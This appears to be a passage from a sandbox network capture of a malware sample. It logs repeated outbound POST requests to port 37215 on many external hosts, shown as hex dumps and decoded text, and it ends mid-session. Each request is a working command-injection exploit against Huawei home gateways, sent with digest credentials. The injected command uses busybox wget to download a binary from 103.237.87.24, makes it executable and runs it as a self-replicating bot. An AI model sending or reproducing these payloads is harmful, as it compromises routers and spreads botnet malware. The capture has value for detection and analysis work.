3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1496192.168.2.135140041.185.213.7937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.491755962 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1497192.168.2.135091641.68.16.15337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.491800070 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1498192.168.2.135505641.132.204.17137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.491801023 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1499192.168.2.1335896103.46.233.24237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.491822004 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1500192.168.2.1336228165.90.74.11337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.491904974 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1501192.168.2.135159041.14.174.5537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.491910934 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1502192.168.2.1344906197.157.164.7437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.491961956 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1503192.168.2.135904041.118.108.4037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.492125988 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1504192.168.2.135623441.180.212.8937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.492132902 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1505192.168.2.135203441.236.45.12637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.492141008 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1506192.168.2.1350600197.105.246.9137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.492186069 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
